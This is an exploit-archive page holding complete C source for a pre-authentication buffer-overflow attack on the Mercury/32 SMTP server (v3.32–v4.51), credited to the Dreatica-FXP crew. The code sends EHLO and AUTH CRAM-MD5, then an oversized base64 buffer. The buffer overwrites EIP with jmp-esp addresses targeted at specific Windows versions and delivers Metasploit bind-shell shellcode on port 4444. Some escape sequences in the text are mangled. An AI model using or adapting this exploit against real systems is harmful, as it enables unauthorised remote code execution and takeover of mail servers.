[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mercury/32 v3.32-v4.51 SMTP Pre-Auth EIP Overwrite Exploit
# Published : 2007-08-26
# Author : Heretic2
# Previous Title : NVR SP2 2.0 (nvUtility.dll v. 1.0.14.0) DeleteXMLFile() Inscure Method
# Next Title : SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Mercury/32 SMTP Server
* Found by : muts@offensive-security.com, http://www.offensive-security.com
* ----------------------------------------
* Exploit : Mercury/32 v3.32-v4.51 SMTP Pre-Auth EIP overwrite exploit
* Exploit date : 26.08.2007
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : The EIP overwrite exploitation is easy here and works on previous versions of the
* Mercury/32, like 4.01a, 4.01b and may be earlier.
* ----------------------------------------
* Thanks to:
* 1. eliteb0y ( )
* 2. The Metasploit project ( http://metasploit.com )
* 3. http://www.ph4nt0m.org ( )
* 4. Dreatica-FXP crew ( )
* ----------------------------------------
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
************************************************************************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32")
#include <ctype.h>
void usage(char * s);
void logo();
void end_logo();
void prepare_shellcode(unsigned char * fsh, int sh);
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh);
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
SOCKET do_connect (char *remotehost, int port);
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) ;
void base64_decode(char const * encoded_string, char * ret) ;
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct {
const char *t ;
unsigned long ret ;
} targets[]=
{
{"UNIVERSAL: Mercury/32 SMTP v4.51 [TER32.dll ]", 0x258d0d1e },// jmp esp
{"Windows XP SP0 RUSSIAN [shell32.dll]", 0x77b49bbb },// jmp esp
{"Windows XP SP1 RUSSIAN [user32.dll ]", 0x77db532f },// jmp esp
{"Windows XP SP2 RUSSIAN [shell32.dll]", 0x7d168fe7 },// jmp esp
{"Windows 2003 SP0 STANDART [shell32.dll]", 0x77b0f967 },// jmp esp
{"Debug", 0x42424242 },//
{NULL, 0x00000000 }
};
struct {
const char * name;
int length;
char * shellcode;
}shellcodes[]={
{"Bindshell, port 4444 [ args: none ]", 344,
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
"x2bxc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0ex02"
"x6bx82x87x83xeexfcxe2xf4xfex01x69xcaxeax92x7dx78"
"xfdx0bx09xebx26x4fx09xc2x3exe0xfex82x7ax6ax6dx0c"
"x4dx73x09xd8x22x6ax69xcex89x5fx09x86xecx5ax42x1e"
"xaexefx42xf3x05xaax48x8ax03xa9x69x73x39x3fxa6xaf"
"x77x8ex09xd8x26x6ax69xe1x89x67xc9x0cx5dx77x83x6c"
"x01x47x09x0ex6ex4fx9exe6xc1x5ax59xe3x89x28xb2x0c"
"x42x67x09xf7x1exc6x09xc7x0ax35xeax09x4cx65x6exd7"
"xfdxbdxe4xd4x64x03xb1xb5x6ax1cxf1xb5x5dx3fx7dx57"
"x6axa0x6fx7bx39x3bx7dx51x5dxe2x67xe1x83x86x8ax85"
"x57x01x80x78xd2x03x5bx8exf7xc6xd5x78xd4x38xd1xd4"
"x51x38xc1xd4x41x38x7dx57x64x03x93xdbx64x38x0bx66"
"x97x03x26x9dx72xacxd5x78xd4x01x92xd6x57x94x52xef"
"xa6xc6xacx6ex55x94x54xd4x57x94x52xefxe7x22x04xce"
"x55x94x54xd7x56x3fxd7x78xd2xf8xeax60x7bxadxfbxd0"
"xfdxbdxd7x78xd2x0dxe8xe3x64x03xe1xeax8bx8exe8xd7"
"x5bx42x4ex0exe5x01xc6x0exe0x5ax42x74xa8x95xc0xaa"
"xfcx29xaex14x8fx11xbax2cxa9xc0xeaxf5xfcxd8x94x78"
"x77x2fx7dx51x59x3cxd0xd6x53x3axe8x86x53x3axd7xd6"
"xfdxbbxeax2axdbx6ex4cxd4xfdxbdxe8x78xfdx5cx7dx57"
"x89x3cx7ex04xc6x0fx7dx51x50x94x52xefxf2xe1x86xd8"
"x51x94x54x78xd2x6bx82x87"
},
{NULL , NULL }
};
// -----------------------------------------------------------------
// BASE64
// -----------------------------------------------------------------
char base64_chars[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/";
static inline bool is_base64(unsigned char c) {
return (isalnum(c) || (c == '+') || (c == '/'));
}
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret)
{
int i = 0;
int j = 0;
unsigned char char_array_3[3];
unsigned char char_array_4[4];
while (in_len--)
{
char_array_3[i++] = *(bytes_to_encode++);
if (i == 3) {
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for(i = 0; (i <4) ; i++)
ret[strlen(ret)]=base64_chars[char_array_4[i]];
//ret += base64_chars[char_array_4[i]];
i = 0;
}
}
if (i)
{
for(j = i; j < 3; j++)
char_array_3[j] = '�';
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for (j = 0; (j < i + 1); j++)
ret[strlen(ret)]=base64_chars[char_array_4[j]];
//ret += base64_chars[char_array_4[j]];
while((i++ < 3))
ret[strlen(ret)]='=';
//ret += '=';
}
}
void base64_decode(char const * encoded_string, char * ret)
{
int in_len = strlen(encoded_string);//encoded_string.size();
int i = 0;
int j = 0;
int in_ = 0;
unsigned char char_array_4[4], char_array_3[3];
while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_]))
{
char_array_4[i++] = encoded_string[in_]; in_++;
if (i ==4) {
for (i = 0; i <4; i++)
char_array_4[i] = strchr(base64_chars, char_array_4[i])-base64_chars;//base64_chars.find(char_array_4[i]);
char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
for (i = 0; (i < 3); i++)
ret[strlen(ret)]=char_array_3[i];
//ret += char_array_3[i];
i = 0;
}
}
if (i) {
for (j = i; j <4; j++)
char_array_4[j] = 0;
for (j = 0; j <4; j++)
char_array_4[j] = strchr(base64_chars, char_array_4[j])-base64_chars;//base64_chars.find(char_array_4[j]);
char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
for (j = 0; (j < i - 1); j++) ret[strlen(ret)]=char_array_3[j];//ret += char_array_3[j];
}
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
int main(int argc, char **argv)
{
char * remotehost=NULL;
char default_remotehost[]="127.0.0.1";
char temp1[100], temp2[100];
int port, itarget, sh;
SOCKET s;
char c;
logo();
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
if(argc<2)
{
usage(argv[0]);
return -1;
}
// set defaults
port=25;
itarget=0;
sh=0;
// ------------
while((c = getopt(argc, argv, "h:p:s:t:"))!= EOF)
{
switch (c)
{
case 'h':
remotehost=optarg;
break;
case 's':
sscanf(optarg, "%d", &sh);
sh--;
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'p':
sscanf(optarg, "%d", &port);
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}
if(remotehost == NULL) remotehost=default_remotehost;
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
memset(temp1, 'x20' , 58 - strlen(remotehost) -1);
printf(" # Host : %s%s# n", remotehost, temp1);
sprintf(temp2, "%d", port);
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(temp2) -1);
printf(" # Port : %s%s# n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", shellcodes[sh].name );
memset(temp1, 'x20' , 58 - strlen(temp2) -1);
printf(" # Payload : %s%s# n", temp2, temp1);
if(itarget>=0)
{
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 57 - strlen(targets[itarget].t) -1);
printf(" # Target : %s%s# n", targets[itarget].t, temp1);
}else
{
printf(" # ------------------------------------------------------------------- # n");
printf("[-] Target is invalidn");
end_logo();
return -1;
}
printf(" # ------------------------------------------------------------------- # n");
fflush(stdout);
printf("[+] Checking if server is onlinen");
fflush(stdout);
s=do_connect(remotehost, port);
if(s==-1)
{
printf("[-] Server is OFFLINEn");
end_logo();
return 0;
}
closesocket(s);
printf("[+] Server is ONLINEn");
unsigned char buf[50000];
unsigned int len;
memset(buf,0,sizeof(buf));
fflush(stdout);
make_buffer(buf, &len, itarget, sh);
printf("[+] Attacking buffers constructedn");
if(send_buffer(buf, len, remotehost,port)==-1)
{
printf("[-] Cannot exploit server %sn", remotehost);
end_logo();
WSACleanup();
return -1;
}
printf("[+] Buffer sent");
printf("[+] Now try connect to %s:%dn", remotehost, 4444);
end_logo();
return 0;
}
SOCKET do_connect (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
SOCKET s;
host = gethostbyname(remotehost);
if (!host)
{
perror("[-] gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
closesocket(s);
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
closesocket(s);
return -1;
}
return s;
}
void prepare_shellcode( char * fsh, unsigned int * fshlen, int sh)
{
memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
*fshlen = shellcodes[sh].length;
}
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh)
{
// prepare shellcode
char fsh[10000];
unsigned int fshlen;
memset(fsh, 0, sizeof(fsh));
prepare_shellcode(fsh, &fshlen, sh);
// -----------------
// make buffer with shellcode inside
unsigned char * cp=buf;
// init
memset(cp, 'x41', 1300);
cp+=204;
// replace EIP
*cp++ = (char)((targets[itarget].ret ) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
// jff
*cp++ = 'x90';
*cp++ = 'x90';
*cp++ = 'x90';
*cp++ = 'x90';
// copy the shellcode
memcpy(cp, fsh, fshlen);
cp+=fshlen;
*len = (unsigned int)(cp-buf);
// -----------------
}
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port)
{
char bufmax[4096], sendbuf[5000];
SOCKET s;
s = do_connect(remotehost, port);
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Server: %sn", bufmax);
// send EHLO
memset(sendbuf, 0, sizeof(sendbuf));
strcat(sendbuf, "EHLO Dreatica-FXPrn");
printf("[+] Request: EHLO Dreatica-FXPn");
send(s, sendbuf, (int)strlen(sendbuf),0);
// send AUTH CRAM-MD5
memset(sendbuf, 0, sizeof(sendbuf));
strcat(sendbuf, "AUTH CRAM-MD5rn");
printf("[+] Request: AUTH CRAM-MD5n");
send(s, sendbuf, (int)strlen(sendbuf),0);
// i don't make the correct recv procedure like Zhenhan.Liu have done in his code
// just put 3 recv for that
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Reply: %sn",bufmax);
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Reply: %sn",bufmax);
memset(bufmax, 0 , sizeof(bufmax));
recv(s, bufmax, sizeof(bufmax),0);
bufmax[sizeof(bufmax)-1] = 0;
printf("[+] Reply: %sn",bufmax);
// ALL is OKE
printf("[+] Sending payload...n");
memset(sendbuf, 0, sizeof(sendbuf));
base64_encode(buf, len, sendbuf);
sendbuf[strlen(sendbuf)]= 'r';
sendbuf[strlen(sendbuf)]= 'n';
send(s, sendbuf, (int)strlen(sendbuf), 0);
closesocket(s);
return 1;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '�')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '�')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '�')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
void usage(char * s)
{
printf("n");
printf(" Usage: %s -p <port> -h <host> -s <shellcode> -t <target>nn", s);
printf(" Arguments:n");
printf(" -p <port> Port of the Mercury SMTP (default: 25)n");
printf(" -h <host> Hostname of the servern");
printf(" -s <shellcode> Payload to use (default: 1)n");
printf(" -t <target> Target to attack (default: 1)n");
printf("n");
printf(" Shellcodes:n");
for(int i=0; shellcodes[i].name!=0;i++)
{
printf(" %d. %sn",i+1,shellcodes[i].name);
}
printf("n");
printf(" Targets:n");
for(int j=0; targets[j].t!=0;j++)
{
printf(" %d. %sn",j+1,targets[j].t);
}
printf("n");
end_logo();
}
void logo()
{
printf("nn");
printf(" ####################################################################### n");
printf(" # ____ __ _ ______ __ _____ #n");
printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / #n");
printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / #n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ #n");
printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ #n");
printf(" # crew #n");
printf(" ####################################################################### n");
printf(" # Exploit : Mercury/32 v3.32-v4.51 SMTP EIP overwrite exploit # n");
printf(" # Tested : Mercury/32 SMTP v3.32, v4.01a, v4.51 # n");
printf(" # Author : Heretic2 (http://www.dreatica.cl/) # n");
printf(" # Research: eliteb0y # n");
printf(" # Version : 1.0 # n");
printf(" # System : Windows ALL # n");
printf(" # Date : 26.08.2007 # n");
printf(" # ------------------------------------------------------------------- # n");
}
void end_logo()
{
printf(" # ------------------------------------------------------------------- # n");
printf(" # Dreatica-FXP crew [Heretic2] # n");
printf(" ####################################################################### nn");
}
// www.Syue.com [2007-08-26]